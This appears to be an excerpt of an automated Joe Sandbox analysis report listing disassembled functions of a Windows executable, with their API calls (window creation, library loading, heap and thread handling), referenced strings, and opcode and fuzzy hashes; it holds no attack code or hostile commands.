                                                                                • Part of subcall function 00408DF8: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00408E1A
                                                                                • Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B
                                                                              • GetStockObject.GDI32(00000011), ref: 00408F52
                                                                              • LoadIconW.USER32 ref: 00408F89
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
                                                                              • RegisterClassExW.USER32 ref: 00408FC1
                                                                              • IsWindowEnabled.USER32(?), ref: 00408FE8
                                                                              • EnableWindow.USER32(00000000), ref: 00408FF9
                                                                              • GetSystemMetrics.USER32(00000001), ref: 00409031
                                                                              • GetSystemMetrics.USER32(00000000), ref: 0040903E
                                                                              • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 0040905F
                                                                              • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 004090A1
                                                                              • SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
                                                                              • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 004090F7
                                                                              • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
                                                                              • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
                                                                              • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
                                                                              • wcslen.MSVCRT ref: 00409129
                                                                              • wcslen.MSVCRT ref: 00409131
                                                                              • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
                                                                              • CreateWindowExW.USER32(00000000,BUTTON,00412080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 0040916D
                                                                              • SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
                                                                              • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
                                                                              • SetForegroundWindow.USER32(00000000), ref: 004091BF
                                                                              • BringWindowToTop.USER32(00000000), ref: 004091C6
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
                                                                              • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
                                                                              • TranslateMessage.USER32(?), ref: 004091F9
                                                                              • DispatchMessageW.USER32(?), ref: 00409204
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00409218
                                                                              • wcslen.MSVCRT ref: 00409229
                                                                              • wcscpy.MSVCRT ref: 00409241
                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: MessageWindow$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconObjectRegisterStock
                                                                              • String ID: 0$BUTTON$D A$EDIT$STATIC
                                                                              • API String ID: 3646533217-3594934238
                                                                              • Opcode ID: 3fcf05c2c670f9430beb8a8042eecd10dcdbf7949def48891d5c24a0ba03bd32
                                                                              • Instruction ID: 4016936b5c3c7f784b3cc7a4ee05ecee8f5df5742f345e72c0c18d3b3e823eb4
                                                                              • Opcode Fuzzy Hash: 3fcf05c2c670f9430beb8a8042eecd10dcdbf7949def48891d5c24a0ba03bd32
                                                                              • Instruction Fuzzy Hash: 1E917F70648300BFE7219F61DC4AF9B7FA9FB48B44F01893EF644A61E1C7B998408B59
                                                                              Function 004092F5 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 116libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 00409313
                                                                                • Part of subcall function 0040E350: TlsGetValue.KERNEL32(0000000E,?,?,00409859,00000000), ref: 0040E35A
                                                                              • memset.MSVCRT ref: 00409321
                                                                              • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
                                                                              • wcsncpy.MSVCRT ref: 0040937D
                                                                              • wcslen.MSVCRT ref: 00409391
                                                                              • wcslen.MSVCRT ref: 00409421
                                                                              • FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryProcwcslen$FreeInitializeLoadValuememsetwcsncpy
                                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                              • API String ID: 1239124402-4219398408
                                                                              • Opcode ID: 42003ebdf0c47dd137335dbc09b8f1923353f45383f5fc8fbfe1239afd240aba
                                                                              • Instruction ID: 1392e4e60208b56ee8b10dacf4ca704cd47aacd570b2ed0dd50540f2d7556013
                                                                              • Opcode Fuzzy Hash: 42003ebdf0c47dd137335dbc09b8f1923353f45383f5fc8fbfe1239afd240aba
                                                                              • Instruction Fuzzy Hash: 81418571504300AAC720EF759C49A9FBBE8EF88744F00483FF945E3292D779D9458B6A
                                                                              Function 00411D62 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32(?,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411D72
                                                                              • RtlInitializeCriticalSection.NTDLL(00417680), ref: 00411D7E
                                                                              • TlsGetValue.KERNEL32(?,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411D94
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00411DAE
                                                                              • RtlEnterCriticalSection.NTDLL(00417680), ref: 00411DBF
                                                                              • RtlLeaveCriticalSection.NTDLL(00417680), ref: 00411DDB
                                                                              • GetCurrentProcess.KERNEL32(00000010,00100000,00000000,00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411DF4
                                                                              • GetCurrentThread.KERNEL32 ref: 00411DF7
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411DFE
                                                                              • DuplicateHandle.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411E01
                                                                              • RegisterWaitForSingleObject.KERNEL32(0000000C,00000010,00411E5A,00000000,000000FF,00000008), ref: 00411E17
                                                                              • TlsSetValue.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411E24
                                                                              • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00411E35
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2673290768-0
                                                                              • Opcode ID: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
                                                                              • Instruction ID: 8d0ee0ed933d17ffb5573716605f6a27c21e7768710c452de208be154d108613
                                                                              • Opcode Fuzzy Hash: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
                                                                              • Instruction Fuzzy Hash: 91210770645301EFDB109FA4FC88B963B7AFB08761F11C43AFA059A2A5DB74D840CB68
                                                                              Function 0040A7DA Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
                                                                                • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
                                                                              • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A803
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A815
                                                                              • wcscpy.MSVCRT ref: 0040A83B
                                                                              • wcscat.MSVCRT ref: 0040A846
                                                                              • wcslen.MSVCRT ref: 0040A84C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004046B8,00000000), ref: 0040A861
                                                                              • wcscat.MSVCRT ref: 0040A879
                                                                              • wcslen.MSVCRT ref: 0040A87F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Librarywcscatwcslen$AddressAllocateFreeHeapLoadProcValuewcscpy
                                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                              • API String ID: 1264281023-287042676
                                                                              • Opcode ID: b1cb2b827d924665fd2adeb937a2355c88ec01053d4281b0242acf6ac71bb9bc
                                                                              • Instruction ID: a59125e26d23ccb30f5fa0f47659a7dbf798ada992acc4f36018911529e702ca
                                                                              • Opcode Fuzzy Hash: b1cb2b827d924665fd2adeb937a2355c88ec01053d4281b0242acf6ac71bb9bc
                                                                              • Instruction Fuzzy Hash: 0D210A32244301B6E11037A2AD4AF6B3A68CB41B94F10843BFD01B51C1D6BC897696AF
                                                                              Function 00403275 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                                                              • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                                                              • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000), ref: 00403434
                                                                                • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                                                              • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 00403471
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                              • String ID: sysnative
                                                                              • API String ID: 3406704365-821172135
                                                                              • Opcode ID: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
                                                                              • Instruction ID: 120ea7a7f831b7b3701c46aacaf1f8b25255709322070768e577057f0a501d54
                                                                              • Opcode Fuzzy Hash: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
                                                                              • Instruction Fuzzy Hash: 39512075518701AAD600BBB1CD82F2F66A9EFD0708F10C83FB144791D2CA3CD9595BAE
                                                                              Function 0040D9E3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D9F1
                                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040DA21
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040DA30
                                                                              • Sleep.KERNEL32(00000000), ref: 0040DA42
                                                                              • InterlockedExchange.KERNEL32(?,00000002), ref: 0040DA55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                              • API String ID: 2918862794-1339284965
                                                                              • Opcode ID: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                              • Instruction ID: 78d57fd6bf002b5b6c2ef9560121a390c40c5b5e23dd256736785be4ed7191ec
                                                                              • Opcode Fuzzy Hash: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                              • Instruction Fuzzy Hash: 0E01D431B14204BBD7102FE4AC49FEB3B29EB86B12F11803AF505A11C4DB788909CA6D
                                                                              Function 004062B0 Relevance: 13.8, APIs: 9, Instructions: 275COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@_wcsdupwcsncpy$Value
                                                                              • String ID:
                                                                              • API String ID: 3451606040-0
                                                                              • Opcode ID: 18ebab3364349f054bf8340b61c70f4d2165a231e3e0755032edd230e75b6dd8
                                                                              • Instruction ID: ef8ff848e519ff80595976f88fda9aa54c27a9e0628953f57c1371388918df2b
                                                                              • Opcode Fuzzy Hash: 18ebab3364349f054bf8340b61c70f4d2165a231e3e0755032edd230e75b6dd8
                                                                              • Instruction Fuzzy Hash: 70A1BD71504301AFCB209F18C88166BB7B1EF94348F05093EFD86A7395E77AD925CB9A
                                                                              Function 004094A7 Relevance: 10.6, APIs: 7, Instructions: 50threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004094BF
                                                                              • IsWindowVisible.USER32(?), ref: 004094C6
                                                                                • Part of subcall function 0040DB12: RtlAllocateHeap.NTDLL(00000008,00000000,0040D38C), ref: 0040DB1E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004094E3
                                                                              • GetForegroundWindow.USER32 ref: 004094FE
                                                                              • IsWindowEnabled.USER32(?), ref: 00409509
                                                                              • EnableWindow.USER32(?,00000000), ref: 00409519
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                                                              • String ID:
                                                                              • API String ID: 2983394722-0
                                                                              • Opcode ID: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                              • Instruction ID: d72cecd996af7503d4a55556d0eaf5d1fe8b6ec4fae3718c35eb9c11583601b7
                                                                              • Opcode Fuzzy Hash: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                              • Instruction Fuzzy Hash: B10175312043016ED3215B79AC88AAB7AE8EF95754B15803EF545E31A6DB74DC01C669
                                                                              Function 00409528 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumWindows.USER32(004094A7,?), ref: 0040953B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409553
                                                                              • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,004092B0,00000000,00408E8A), ref: 0040956F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040958F
                                                                              • EnableWindow.USER32(?,00000001), ref: 004095A5
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,004092B0,00000000,00408E8A), ref: 004095BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                                              • String ID:
                                                                              • API String ID: 2527101397-0
                                                                              • Opcode ID: a3a0aeb73a1e0995adc417d57e62e0e38a3107fe39a7a04aa6534d5b9020df72
                                                                              • Instruction ID: f5bff55c5df6c6442a3445df2da52706b8c810d9f19cb65a9eb7b3fa66b57753
                                                                              • Opcode Fuzzy Hash: a3a0aeb73a1e0995adc417d57e62e0e38a3107fe39a7a04aa6534d5b9020df72
                                                                              • Instruction Fuzzy Hash: 6A11AC32609351BBD7324B17EC08F53BBA9AB81B21F15863EF456221E1DB759D00C618
                                                                              Function 0040D2F3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D318
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040D32C
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D339
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D350
                                                                              • RtlReAllocateHeap.NTDLL(00000008,00000000), ref: 0040D35F
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D36E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateHeap$Alloc
                                                                              • String ID:
                                                                              • API String ID: 2511646910-0
                                                                              • Opcode ID: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                              • Instruction ID: 9f859b01fecb640b0c0eeeefa64339d4fa0418cdbc8b4e3825918bdf59145f1e
                                                                              • Opcode Fuzzy Hash: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                              • Instruction Fuzzy Hash: 76116072B44710AFD7119FA9EC48AA67BB9FB48760B05843AFA04D33A0D7359C048B6C
                                                                              Function 00411CE4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • UnregisterWait.KERNEL32(?), ref: 00411CEE
                                                                              • CloseHandle.KERNEL32(?), ref: 00411CF7
                                                                              • RtlEnterCriticalSection.NTDLL(00417680), ref: 00411D03
                                                                              • RtlLeaveCriticalSection.NTDLL(00417680), ref: 00411D28
                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00411D46
                                                                              • HeapFree.KERNEL32(?,?), ref: 00411D58
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                              • String ID:
                                                                              • API String ID: 4204870694-0
                                                                              • Opcode ID: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                              • Instruction ID: 8f9f96d7996d446dd79b7cbdc6e3cce5d3da35cfe841f16b8799e142d118698f
                                                                              • Opcode Fuzzy Hash: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                              • Instruction Fuzzy Hash: 6B012574202601BFCB119F15FD88A96BB79FF493513118139E61A87630C735AC51CB98
                                                                              Function 00405553 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00405562
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?), ref: 00405571
                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcmemset
                                                                              • String ID: RtlGetVersion$ntdll.dll
                                                                              • API String ID: 3137504439-1489217083
                                                                              • Opcode ID: 511749e795eec0cdce68fd6837bdff5dd9192a1533a247fbf36adb3b887cc1d8
                                                                              • Instruction ID: d7b210edb93dcdeb2ccead98f224fd87bedff0db37ff7f51e22340fec2856e60
                                                                              • Opcode Fuzzy Hash: 511749e795eec0cdce68fd6837bdff5dd9192a1533a247fbf36adb3b887cc1d8
                                                                              • Instruction Fuzzy Hash: E0E0DF317606127AD6202B32AC09FCB2F9DDFCAB00B15043AB109F21C4E67CC5018ABD
                                                                              Function 00405492 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054AB
                                                                              • RtlEnterCriticalSection.NTDLL(004176A0), ref: 004054BD
                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054D4
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054E0
                                                                              • RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405523
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 458812214-0
                                                                              • Opcode ID: 6ed1f9472aaecad8110596c08d16cfc3ba6fdd38aae9ed686341541dbb8ce168
                                                                              • Instruction ID: c80a9bd37122c97109a10f206962e584b77ac8964ddc4e7c45fa9607085a50ae
                                                                              • Opcode Fuzzy Hash: 6ed1f9472aaecad8110596c08d16cfc3ba6fdd38aae9ed686341541dbb8ce168
                                                                              • Instruction Fuzzy Hash: 1111A336204710BFC2115F59EC05E97BB69EB45762722802AF80197294EB75E9508F6D
                                                                              Function 0040D8E6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D8FA
                                                                              • RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D94F
                                                                                • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D948
                                                                              • RtlDeleteCriticalSection.NTDLL(00000020), ref: 0040D968
                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D977
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3171405041-0
                                                                              • Opcode ID: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                              • Instruction ID: 7b35f574515ae906377effd3f95b136c975bcdd302f3c0dc89a566dd6d791b35
                                                                              • Opcode Fuzzy Hash: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                              • Instruction Fuzzy Hash: BB1158B5502601EFC320AF59EC08F97BBB5FF44311F11843AA44AA36A1C734E849CF98
                                                                              Function 00409638 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
                                                                                • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                              • wcscmp.MSVCRT ref: 00409662
                                                                              • memmove.MSVCRT ref: 0040967A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                                              • String ID: \\?\
                                                                              • API String ID: 2309408642-4282027825
                                                                              • Opcode ID: 4647b580265c0145cb53452cd045566aab0e6573de3ebb33f2025e25eda63a47
                                                                              • Instruction ID: d9f8f264266041fd0450fbf5fddac35174bfa4872681c7093a6bedb058d4d6d6
                                                                              • Opcode Fuzzy Hash: 4647b580265c0145cb53452cd045566aab0e6573de3ebb33f2025e25eda63a47
